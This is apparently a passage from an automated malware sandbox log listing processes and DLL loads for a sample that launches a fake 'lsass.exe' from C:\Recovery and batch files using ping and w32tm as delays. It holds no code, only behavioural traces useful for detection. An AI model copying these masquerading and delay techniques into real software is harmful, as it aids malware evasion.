Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: version.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: version.dll
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: version.dll
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll
